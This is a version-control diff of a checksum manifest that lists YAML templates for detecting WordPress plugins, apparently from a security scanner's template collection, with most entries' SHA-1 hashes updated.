-http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65
-http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61
-http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc
-http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2
-http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12
-http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b
-http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226
-http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77
-http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46
-http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61
-http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f
-http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349
-http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f
-http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b
-http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365
-http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f
-http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55
-http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4
-http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3
+http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724
+http/technologies/wordpress/plugins/akismet.yaml:aae1aaad5533df8ca3806e87626f5bd7a3ed48d7
+http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba
+http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27
+http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96
+http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e
+http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4
+http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f
+http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07
+http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1
+http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c
+http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff
+http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a
+http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e
+http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309
+http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c
+http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d
+http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a
+http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae
+http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299
+http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7
+http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9
 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369
-http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff
-http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a
-http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e
-http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f
-http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d
-http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af
-http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb
-http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb
-http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e
-http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c
-http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06
-http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7
-http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0
-http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c
-http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9
-http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606
-http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157
-http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a
-http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5
-http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7
-http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2
-http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e
+http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844
+http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c
+http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636
+http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e
+http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d
+http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a
+http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef
+http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f
+http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7
+http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057
+http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3
+http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459
+http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad
+http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c
+http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f
+http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7
+http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0
+http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af
+http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a
+http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677
+http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121
+http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984
 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45
-http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7
-http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72
-http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77
-http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb
-http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8
-http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1
-http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d
-http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0
-http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30
-http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb
-http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f
-http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2
-http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5
-http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a
-http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9
-http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33
-http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599
-http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1
-http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4
-http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e
-http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087
-http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d
-http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b
-http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b
-http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b
-http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0
-http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630
+http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201
+http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab
+http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8
+http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77
+http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e
+http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca
+http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa
+http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444
+http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016
+http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1
+http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba
+http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d
+http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823
+http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0
+http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24
+http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca
+http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336
+http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a
+http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3
+http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3
+http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae
+http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053
+http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0
+http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214
+http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc
+http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb
+http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9
 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913
-http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7
-http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90
-http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078
-http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb
-http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994
-http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c
-http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47
-http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43
-http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5
-http/technologies/wordpress/plugins/instagram-feed.yaml:638a2ea1ff92407b33293b19f81421f64dcbbef2
-http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b
-http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952
-http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65
-http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e
-http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c
-http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9
-http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9
-http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9
-http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787
-http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764
-http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93
-http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b
+http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372
+http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765
+http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2
+http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23
+http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7
+http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317
+http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461
+http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4
+http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30
+http/technologies/wordpress/plugins/instagram-feed.yaml:f4867c229ee945f162265d86e1e20f9e908f32da
+http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b
+http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f
+http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391
+http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde
+http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a
+http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac
+http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc
+http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3
+http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046
+http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8
+http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b
+http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0
 http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c
-http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d
-http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea
-http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d
-http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd
-http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f
-http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919
-http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251
-http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e
-http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6
-http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50
-http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9
-http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c
-http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f
-http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6
-http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11
-http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0
-http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8
-http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70
-http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7
-http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1
-http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12
+http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3
+http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519
+http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4
+http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb
+http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4
+http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623
+http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd
+http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb
+http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510
+http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015
+http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9
+http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29
+http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf
+http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8
+http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5
+http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4
+http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159
+http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af
+http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9
+http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68
+http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18
 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd
 http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553
-http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5
-http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f
-http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83
-http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a
-http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa
-http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da
-http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2
-http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4
-http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39
-http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4
-http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad
-http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175
-http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5
-http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864
-http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845
-http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490
-http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf
-http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291
-http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92
-http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d
-http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59
+http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47
+http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c
+http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d
+http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988
+http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e
+http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2
+http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82
+http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4
+http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156
+http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4
+http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147
+http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19
+http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b
+http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8
+http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55
+http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd
+http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08
+http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f
